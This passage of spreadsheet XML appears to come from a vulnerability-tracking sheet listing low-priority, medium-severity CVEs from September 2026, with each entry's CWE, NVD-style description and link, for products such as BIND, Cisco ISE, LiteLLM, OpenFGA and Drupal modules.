          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1176" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19668</t>
        </is>
      </c>
      <c r="D1176" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1176" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1176" s="5" t="inlineStr"/>
      <c r="H1176" s="5" t="inlineStr"/>
      <c r="I1176" s="5" t="inlineStr"/>
      <c r="J1176" s="5" t="inlineStr"/>
      <c r="K1176" s="5" t="inlineStr"/>
      <c r="L1176" s="5" t="inlineStr"/>
      <c r="M1176" s="5" t="inlineStr"/>
      <c r="N1176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1176" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1176" s="5" t="inlineStr"/>
      <c r="Q1176" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="R1176" s="5" t="inlineStr">
        <is>
          <t>A BIND recursive resolver may experience excessive resource consumption if it encounters large numbers of a particular kind of invalid DNSSEC record.  Default limits on "max-records-per-type" and "max-types-per-name" help mitigate the exposure.
This issue affects BIND 9 versions 9.11.0 through 9.18.50, 9.20.0 through 9.20.27, 9.21.0 through 9.21.25, 9.11.3-S1 through 9.18.50-S1, and 9.20.9-S1 through 9.20.27-S1.</t>
        </is>
      </c>
      <c r="S1176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19668</t>
        </is>
      </c>
    </row>
    <row r="1177">
      <c r="A1177" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1177" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20121</t>
        </is>
      </c>
      <c r="D1177" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1177" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1177" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1177" s="5" t="inlineStr"/>
      <c r="H1177" s="5" t="inlineStr"/>
      <c r="I1177" s="5" t="inlineStr"/>
      <c r="J1177" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1177" s="5" t="inlineStr"/>
      <c r="L1177" s="5" t="inlineStr"/>
      <c r="M1177" s="5" t="inlineStr"/>
      <c r="N1177" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1177" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1177" s="5" t="inlineStr"/>
      <c r="Q1177" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R1177" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the access control list (ACL) Object Group Search (OGS) implementation of Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass configured access controls.
This vulnerability is due to a logic error in populating group access control policies (ACPs) with OGS configured. An attacker could exploit this vulnerability by sending traffic that should be blocked through the device. A successful exploit could allow the attacker to bypass access controls and reach devices in protected networks.</t>
        </is>
      </c>
      <c r="S1177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20121</t>
        </is>
      </c>
    </row>
    <row r="1178">
      <c r="A1178" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1178" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57581</t>
        </is>
      </c>
      <c r="D1178" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1178" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1178" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1178" s="5" t="inlineStr"/>
      <c r="H1178" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1178" s="5" t="inlineStr"/>
      <c r="J1178" s="5" t="inlineStr"/>
      <c r="K1178" s="5" t="inlineStr"/>
      <c r="L1178" s="5" t="inlineStr"/>
      <c r="M1178" s="5" t="inlineStr"/>
      <c r="N1178" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1178" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1178" s="5" t="inlineStr"/>
      <c r="Q1178" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R1178" s="5" t="inlineStr">
        <is>
          <t>DotVVM is an open source MVVM framework for web applications. Prior to 4.2.11, 4.3.15, and 5.0.0-preview09-final, applications with configured file upload storage allow unauthenticated users to submit files directly to DotvvmFileUploadMiddleware without an X-DotVVM-UploadToken generated by the FileUpload component. An attacker can repeatedly upload files and fill application storage, causing denial of service. DotvvmConfiguration.Security.AuthorizeFileUpload can additionally restrict which users may upload files. This issue is fixed in versions 4.2.11, 4.3.15, and 5.0.0-preview09-final.</t>
        </is>
      </c>
      <c r="S1178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57581</t>
        </is>
      </c>
    </row>
    <row r="1179">
      <c r="A1179" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1179" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59823</t>
        </is>
      </c>
      <c r="D1179" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1179" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1179" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1179" s="5" t="inlineStr"/>
      <c r="H1179" s="5" t="inlineStr"/>
      <c r="I1179" s="5" t="inlineStr"/>
      <c r="J1179" s="5" t="inlineStr"/>
      <c r="K1179" s="5" t="inlineStr"/>
      <c r="L1179" s="5" t="inlineStr"/>
      <c r="M1179" s="5" t="inlineStr"/>
      <c r="N1179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1179" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1179" s="5" t="inlineStr"/>
      <c r="Q1179" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1179" s="5" t="inlineStr">
        <is>
          <t>LiteLLM is a proxy server (AI Gateway) to call LLM APIs in OpenAI (or native) format. Prior to 1.83.9, an authenticated LiteLLM Proxy caller with a valid virtual key can place api_base inside the user_config request body to bypass is_request_body_safe, which blocks top-level api_base and base_url but previously did not inspect or reject user_config. Because user_config constructs the outbound router, the nested destination redirects a server-side request to an internal or external host selected by the caller and can expose endpoints the caller cannot otherwise access. This issue is fixed in version 1.83.9.</t>
        </is>
      </c>
      <c r="S1179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59823</t>
        </is>
      </c>
    </row>
    <row r="1180">
      <c r="A1180" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1180" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61709</t>
        </is>
      </c>
      <c r="D1180" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1180" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1180" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1180" s="5" t="inlineStr"/>
      <c r="H1180" s="5" t="inlineStr"/>
      <c r="I1180" s="5" t="inlineStr"/>
      <c r="J1180" s="5" t="inlineStr"/>
      <c r="K1180" s="5" t="inlineStr"/>
      <c r="L1180" s="5" t="inlineStr">
        <is>
          <t>go:github.com/openfga/openfga</t>
        </is>
      </c>
      <c r="M1180" s="5" t="inlineStr">
        <is>
          <t>1.18.1</t>
        </is>
      </c>
      <c r="N1180" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O1180" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1180" s="5" t="inlineStr"/>
      <c r="Q1180" s="5" t="inlineStr">
        <is>
          <t>CWE-281, CWE-863</t>
        </is>
      </c>
      <c r="R1180" s="5" t="inlineStr">
        <is>
          <t>OpenFGA is an authorization and permission engine built for developers. Prior to 1.18.1, the ListUsers API could return a user that should have been excluded when an authorization relation used an intersection containing a base but not excluded operand, the base was granted through a type-bound public wildcard, and the excluded user also had a concrete tuple through another intersection operand. In pkg/server/commands/listusers/list_users_rpc.go, expandIntersection counted the concrete tuple and wildcard without first rejecting entries in excludedUsersMap. Applications that used ListUsers to enumerate or enforce access could therefore treat an excluded user as authorized. This issue is fixed in version 1.18.1.</t>
        </is>
      </c>
      <c r="S1180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61709</t>
        </is>
      </c>
    </row>
    <row r="1181">
      <c r="A1181" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1181" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73443</t>
        </is>
      </c>
      <c r="D1181" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1181" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1181" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G1181" s="5" t="inlineStr"/>
      <c r="H1181" s="5" t="inlineStr"/>
      <c r="I1181" s="5" t="inlineStr"/>
      <c r="J1181" s="5" t="inlineStr"/>
      <c r="K1181" s="5" t="inlineStr"/>
      <c r="L1181" s="5" t="inlineStr"/>
      <c r="M1181" s="5" t="inlineStr"/>
      <c r="N1181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1181" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1181" s="5" t="inlineStr"/>
      <c r="Q1181" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="R1181" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS with VRRPv2 IP-AH authentication configured, an unauthenticated attacker within the same layer 2 network segment on which VRRP is running can capture a legitimate authenticated VRRP advertisement and replay it indefinitely. Replayed advertisements can be used to advertise stale VRRP state, for example to prevent a backup router from taking over the virtual gateway after the original master has gone down, resulting in a denial of service for hosts using the virtual gateway address.</t>
        </is>
      </c>
      <c r="S1181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73443</t>
        </is>
      </c>
    </row>
    <row r="1182">
      <c r="A1182" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1182" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73477</t>
        </is>
      </c>
      <c r="D1182" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1182" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1182" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1182" s="5" t="inlineStr"/>
      <c r="H1182" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1182" s="5" t="inlineStr"/>
      <c r="J1182" s="5" t="inlineStr"/>
      <c r="K1182" s="5" t="inlineStr">
        <is>
          <t>quick_tabs_project:quick_tabs</t>
        </is>
      </c>
      <c r="L1182" s="5" t="inlineStr"/>
      <c r="M1182" s="5" t="inlineStr"/>
      <c r="N1182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1182" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P1182" s="5" t="inlineStr"/>
      <c r="Q1182" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1182" s="5" t="inlineStr">
        <is>
          <t>Incorrect Authorization vulnerability in Drupal Quick Tabs allows Forceful Browsing. This issue affects Quick Tabs versions: from 0.0.0 to 4.3.1.</t>
        </is>
      </c>
      <c r="S1182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73477</t>
        </is>
      </c>
    </row>
    <row r="1183">
      <c r="A1183" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1183" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73478</t>
        </is>
      </c>
      <c r="D1183" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1183" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1183" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1183" s="5" t="inlineStr"/>
      <c r="H1183" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1183" s="5" t="inlineStr"/>
      <c r="J1183" s="5" t="inlineStr"/>
      <c r="K1183" s="5" t="inlineStr">
        <is>
          <t>diff_project:diff</t>
        </is>
      </c>
      <c r="L1183" s="5" t="inlineStr"/>
      <c r="M1183" s="5" t="inlineStr"/>
      <c r="N1183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1183" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P1183" s="5" t="inlineStr"/>
      <c r="Q1183" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1183" s="5" t="inlineStr">
        <is>
          <t>Incorrect Authorization vulnerability in Drupal Diff allows Forceful Browsing. This issue affects Diff versions: from 0.0.0 to 2.0.1, from 2.1.0 to 2.1.1.</t>
        </is>
      </c>
      <c r="S1183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73478</t>
        </is>
      </c>
    </row>
    <row r="1184">
      <c r="A1184" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75029</t>
        </is>
      </c>
      <c r="D1184" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1184" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1184" s="5" t="inlineStr"/>
      <c r="H1184" s="5" t="inlineStr"/>
      <c r="I1184" s="5" t="inlineStr"/>
      <c r="J1184" s="5" t="inlineStr"/>
      <c r="K1184" s="5" t="inlineStr"/>
      <c r="L1184" s="5" t="inlineStr"/>
      <c r="M1184" s="5" t="inlineStr"/>
      <c r="N1184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1184" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1184" s="5" t="inlineStr"/>
      <c r="Q1184" s="5" t="inlineStr">
        <is>
          <t>CWE-405</t>
        </is>
      </c>
      <c r="R1184" s="5" t="inlineStr">
        <is>
          <t>In a query response, an attacker may send `named` multiple copies of a record that should only exist once (such as an SOA record). If the RDATA is the same on all the copies, the record is appended to the in-memory RDATA set, which can cause increased memory usage of the negative cache and possibly lead to other memory attack vectors.
This issue affects BIND 9 versions 9.11.0 through 9.18.50, 9.20.0 through 9.20.27, 9.21.0 through 9.21.25, 9.11.3-S1 through 9.18.50-S1, and 9.20.9-S1 through 9.20.27-S1.</t>
        </is>
      </c>
      <c r="S1184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75029</t>
        </is>
      </c>
    </row>
    <row r="1185">
      <c r="A1185" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1185" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76433</t>
        </is>
      </c>
      <c r="D1185" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1185" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1185" s="5" t="inlineStr"/>
      <c r="H1185" s="5" t="inlineStr"/>
      <c r="I1185" s="5" t="inlineStr"/>
      <c r="J1185" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1185" s="5" t="inlineStr"/>
      <c r="L1185" s="5" t="inlineStr"/>
      <c r="M1185" s="5" t="inlineStr"/>
      <c r="N1185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1185" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1185" s="5" t="inlineStr"/>
      <c r="Q1185" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1185" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the client provisioning download feature of Cisco ISE and Cisco ISE-PIC could allow an unauthenticated, remote attacker to access protected files on an affected device.
This vulnerability is due to insufficient validation of directory traversal character sequences in a user-supplied path when the software processes provisioning resource requests. An attacker could exploit this vulnerability by sending a crafted request to the provisioning download service. A successful exploit could allow the attacker to access protected files without authentication, potentially exposing sensitive information.</t>
        </is>
      </c>
      <c r="S1185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76433</t>
        </is>
      </c>
    </row>
    <row r="1186">
      <c r="A1186" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76439</t>
        </is>
      </c>
      <c r="D1186" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1186" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1186" s="5" t="inlineStr"/>
      <c r="H1186" s="5" t="inlineStr"/>
      <c r="I1186" s="5" t="inlineStr"/>
      <c r="J1186" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1186" s="5" t="inlineStr"/>
      <c r="L1186" s="5" t="inlineStr"/>
      <c r="M1186" s="5" t="inlineStr"/>
      <c r="N1186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1186" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1186" s="5" t="inlineStr"/>
      <c r="Q1186" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R1186" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the endpoint posture status reporting functionality of the guest portal web application of Cisco ISE could allow an unauthenticated, remote attacker to submit forged posture status events into the endpoint posture pipeline.
This vulnerability is due to insufficient authentication on an internal interface that is exposed through the guest portal. An attacker could exploit this vulnerability by sending a crafted request to an affected system. A successful exploit could allow the attacker to manipulate the posture status on the affected system.</t>
        </is>
      </c>
      <c r="S1186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76439</t>
        </is>
      </c>
    </row>
    <row r="1187">
      <c r="A1187" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76444</t>
        </is>
      </c>
      <c r="D1187" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1187" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1187" s="5" t="inlineStr"/>
      <c r="H1187" s="5" t="inlineStr"/>
      <c r="I1187" s="5" t="inlineStr"/>
      <c r="J1187" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1187" s="5" t="inlineStr"/>
      <c r="L1187" s="5" t="inlineStr"/>
      <c r="M1187" s="5" t="inlineStr"/>
      <c r="N1187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1187" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1187" s="5" t="inlineStr"/>
      <c r="Q1187" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R1187" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in an internal service of Cisco ISE and Cisco ISE-PIC could allow an unauthenticated, remote attacker to retrieve sensitive configuration information from an affected device.
This vulnerability is due to missing authentication on the Policy Runtime Repository Table (PRRT) service. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to obtain sensitive configuration information from the affected device.</t>
        </is>
      </c>
      <c r="S1187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76444</t>
        </is>
      </c>
    </row>
    <row r="1188">
      <c r="A1188" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1188" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76447</t>
        </is>
      </c>
      <c r="D1188" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1188" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1188" s="5" t="inlineStr"/>
      <c r="H1188" s="5" t="inlineStr"/>
      <c r="I1188" s="5" t="inlineStr"/>
      <c r="J1188" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1188" s="5" t="inlineStr"/>
      <c r="L1188" s="5" t="inlineStr"/>
      <c r="M1188" s="5" t="inlineStr"/>
      <c r="N1188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1188" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1188" s="5" t="inlineStr"/>
      <c r="Q1188" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R1188" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the Online Certificate Status Protocol (OCSP) responder of Cisco ISE and Cisco ISE-PIC could allow an unauthenticated, remote attacker to cause an administrative reload of the OCSP responder certificate and key material.
This vulnerability is due to missing authentication on a function of the OCSP responder. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to cause the OCSP responder to reload certificate and key material on demand.</t>
        </is>
      </c>
      <c r="S1188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76447</t>
        </is>
      </c>
    </row>
    <row r="1189">
      <c r="A1189" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80225</t>
        </is>
      </c>
      <c r="D1189" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1189" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1189" s="5" t="inlineStr">
        <is>
          <t>sep@nlnetlabs.nl</t>
        </is>
      </c>
      <c r="G1189" s="5" t="inlineStr"/>
      <c r="H1189" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1189" s="5" t="inlineStr"/>
      <c r="J1189" s="5" t="inlineStr"/>
      <c r="K1189" s="5" t="inlineStr"/>
      <c r="L1189" s="5" t="inlineStr"/>
      <c r="M1189" s="5" t="inlineStr"/>
      <c r="N1189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1189" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1189" s="5" t="inlineStr"/>
      <c r="Q1189" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R1189" s="5" t="inlineStr">
        <is>
          <t>In NLnetLabs Unbound up to and including 1.26.0, a degradation of service vulnerability is present in the TCP/DoT reading procedure where there is no limit on consecutive reads. A malicious actor that can stream and sustain a rate of distinct uncached names over the TCP/DoT connection, monopolizes a single worker's entire event loop for as long as its writes stay ahead of the drain.</t>
        </is>
      </c>
      <c r="S1189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80225</t>
        </is>
      </c>
    </row>
    <row r="1190">
      <c r="A1190" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1190" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81165</t>
        </is>
      </c>
      <c r="D1190" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1190" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1190" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1190" s="5" t="inlineStr"/>
      <c r="H1190" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1190" s="5" t="inlineStr"/>
      <c r="J1190" s="5" t="inlineStr"/>
      <c r="K1190" s="5" t="inlineStr">
        <is>
          <t>blazy_project:blazy</t>
        </is>
      </c>
      <c r="L1190" s="5" t="inlineStr"/>
      <c r="M1190" s="5" t="inlineStr"/>
      <c r="N1190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1190" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P1190" s="5" t="inlineStr"/>
      <c r="Q1190" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1190" s="5" t="inlineStr">
        <is>
          <t>Incorrect Authorization vulnerability in Drupal Blazy allows Forceful Browsing. This issue affects Blazy versions: from 0.0.0 to 3.0.18.</t>
        </is>
      </c>
      <c r="S1190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81165</t>
        </is>
      </c>
    </row>
    <row r="1191">
      <c r="A1191" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1191" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81166</t>
        </is>
      </c>
      <c r="D1191" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1191" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1191" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1191" s="5" t="inlineStr"/>
      <c r="H1191" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1191" s="5" t="inlineStr"/>
      <c r="J1191" s="5" t="inlineStr"/>
      <c r="K1191" s="5" t="inlineStr">
        <is>
          <t>lakedrops:digital_signage_framework</t>
        </is>
      </c>
      <c r="L1191" s="5" t="inlineStr"/>
      <c r="M1191" s="5" t="inlineStr"/>
      <c r="N1191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1191" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P1191" s="5" t="inlineStr"/>
      <c r="Q1191" s="5" t="inlineStr">
        <is>
